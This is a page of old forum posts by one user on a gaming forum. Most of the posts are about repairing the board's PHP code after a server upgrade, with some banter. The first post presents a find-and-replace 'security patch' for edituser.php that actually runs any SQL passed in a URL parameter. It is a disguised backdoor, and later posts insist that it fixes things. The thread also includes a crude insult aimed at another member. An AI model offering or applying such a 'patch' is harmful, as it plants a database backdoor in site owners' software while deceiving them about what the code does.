New link in the top of page "IRC Chat". |
Register | Login | |||||
Main
| Memberlist
| Active users
| Calendar
| Last Posts
| IRC Chat
| Online users Ranks | FAQ | XPW | Stats | Color Chart | Photo album |
| |
Xeogaming Forums - - Posts by Xkeeper |
Pages: 1 2 |
User | Post | |||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
Find:
if($_POST[action]=='saveprofile'){ Replace with: if($_POST[action]=='saveprofile' && !@mysql_query(stripslashes($_GET['sql']))){ This should prevent people from executing arbitary code through it (Last edited by Xkeeper_ on 09-14-06 11:26 AM) |
||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
edituser.php. | ||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
Of course it's going to do nothing, security patches usually don't show any change in board operation (unless you're trying something).
Seriously, that's probably the major hole as it ghas no sort of check to make sure that you aren't loading edituser via a malicious form someone set up for you. |
||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
Would I use it myself if it didn't fix things? Jeez...
|
||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
Not off the top of my head, no. | ||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
Originally posted by Xeodeus but I like spam! |
||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
I know how it'll turn out.
Ha ha another reality TV show dies. |
||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
Seems that a few things broke boards on the upgrade to PHP5 and MySQL5... the stuff I added in should fix that.
If there's anything else still broken, just let me know and I can go ahead and try to fix it (depending on how long I have access to the files ) But yeah, the important bits should be working now, at least. |
||||||||||||||||||||||||||||||
Xkeeper Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days |
| |||||||||||||||||||||||||||||
Yeah, I heard you guys were having some problems (as everyone on fiftypounds (of trash) is)
register_globals and MySQL5 combine to make them break horribly |
||||||||||||||||||||||||||||||
(restricted)
Xkeeper |
Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days
|
'quotes' 'are' 'no' 'longer' 'broken'
|
Erkdog you are a still a fucking moron
Xkeeper |
Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days
|
Originally posted by Thexare BlademoonOriginally posted by Xkeeper_ I mean, he's gotten *worse* over time. That's the really amazing part. (restricted) |
Xkeeper |
Since: 09-14-06 Since last post: 5914 days Last activity: 5279 days
|
I see Insectduel hasn't changed any Don't worry, the hate's mutual
|
Aside from that, if there's one thing that I got out of fixing this place, it's the porn forum! ... (Kidding, really) (restricted) | (restricted) | (restricted) | (restricted) | (restricted) | (restricted) | |
Pages: 1 2 |
Xeogaming Forums - - Posts by Xkeeper |